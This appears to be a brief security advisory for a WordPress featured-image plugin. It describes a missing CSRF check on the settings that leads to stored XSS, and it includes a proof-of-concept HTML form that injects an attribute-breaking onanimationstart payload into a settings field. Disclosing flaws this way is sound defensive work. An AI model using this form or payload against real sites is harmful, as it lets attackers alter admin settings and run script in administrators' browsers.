The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. Furthermore, due to the lack of validation, sanitisation and escaping in some of them, it could also lead to Stored XSS issues
<form action="https://example.com/wp-admin/admin.php?page=featured-image-from-url" method="POST">
<input type="hidden" name="fifu_input_photon" value='on" style=animation-name:rotation onanimationstart=alert(/XSS/)//'/>
<input type="submit" value="Submit request" />
</form>
All settings appear to be affected.
The XSS will be triggered when accessing the settings again